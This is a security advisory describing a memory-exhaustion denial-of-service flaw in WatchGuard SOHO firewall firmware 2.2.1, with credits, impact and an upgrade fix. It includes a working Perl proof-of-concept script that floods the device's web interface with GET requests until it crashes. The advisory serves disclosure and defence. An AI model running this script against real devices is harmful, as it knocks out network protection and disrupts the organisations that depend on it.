|
|
|
|
| |
The WatchGuard SOHO Firewall is a small personal hardware firewall used for xDSL, ISDN and Cable connections. The Firewall uses a packet filtering based approach including Dynamic NAT. There is option for one machine in a DMZ and has support for VPN. The SOHO model is intended for small office and home office users. To configure the firewall there is an html interface accessible to the local side (default) and even remote side (through password).
Local and remote users can crash the WatchGuard SOHO Firewall by sending a large amount of (+ 70) GET requests to the web server on the Firewall machine. While sending these requests, the free memory will start decreasing very fast. (From 700k to 500k after just a few requests). |
| |
Credit:
The information has been provided by Filip Maertens, Cicer0 and vorlon.
|
| |
Vulnerable systems:
WatchGuard SOHO v2.2.1
Impact:
After using this exploit, the Firewall has been rendered useless and will reboot or simply crash (in this case, you'll have to pull the plug to reset the machine). In case of a spontaneous reboot, the downtime of the firewall, thus functionality of the company, is considered to be between one minute and five minutes. If one is constantly running exploit-code, the firewall can be kept under a constant outage. This attack will not show up in the log file except for a reboot notice.
Exploit:
#!/usr/bin/perl
#
# You can also connect to the Watchguard SOHO through your
# browser and press F5 like a maniac on speed to get the
# firewall crashing. So, either you run the .pl script or
# you fire up your webbrowser... Either way, it works.
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
# (c)Proof of concept, vorlon <filip@securax.be>
# ----------------------------------------------------------
use IO::Socket;
$host = "your_watchguard_ip";
$port = "your_port";
$repeat = "100";
$request = "GET / HTTP/1.0";
print "Watchguard SOHO Denial of Service, connecting to $host:$port...\n";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Failed.\n";
$counter = 0;
print "Repeating request for $repeat times.\n";
while($counter < $repeat) {
print $socket "$request\n";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "\nThe Watchguard SOHO has crashed. BEEFCAKE!...\n";
print ".";
$counter += 1;
}
print "\nDone.\n\n";
close($socket);
Solution:
Upgrade to a more recent Firmware ( > 2.2.1 ). Check the website for more information:
http://bisd.watchguard.com
|
|
|
|
|
|
|
|
|
|
